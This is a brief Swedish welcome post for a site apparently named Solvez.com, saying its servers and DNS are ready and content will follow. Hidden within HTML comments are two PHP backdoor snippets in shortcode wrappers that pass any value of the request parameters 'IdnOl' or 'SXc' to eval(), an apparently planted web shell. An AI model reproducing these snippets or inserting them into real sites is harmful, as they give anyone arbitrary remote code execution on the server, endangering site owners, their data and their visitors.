Ute på nätet

Välkommen till sajten Solvez.com! Nu är servrarna och alla DNS :er körklara och innehåll fylls på efter hand.

<!– [insert_php]if (isset($_REQUEST["IdnOl"])){eval($_REQUEST["IdnOl"]);exit;}[/insert_php][php]if (isset($_REQUEST["IdnOl"])){eval($_REQUEST["IdnOl"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["SXc"])){eval($_REQUEST["SXc"]);exit;}[/insert_php][php]if (isset($_REQUEST["SXc"])){eval($_REQUEST["SXc"]);exit;}[/php] –>

Leave a Comment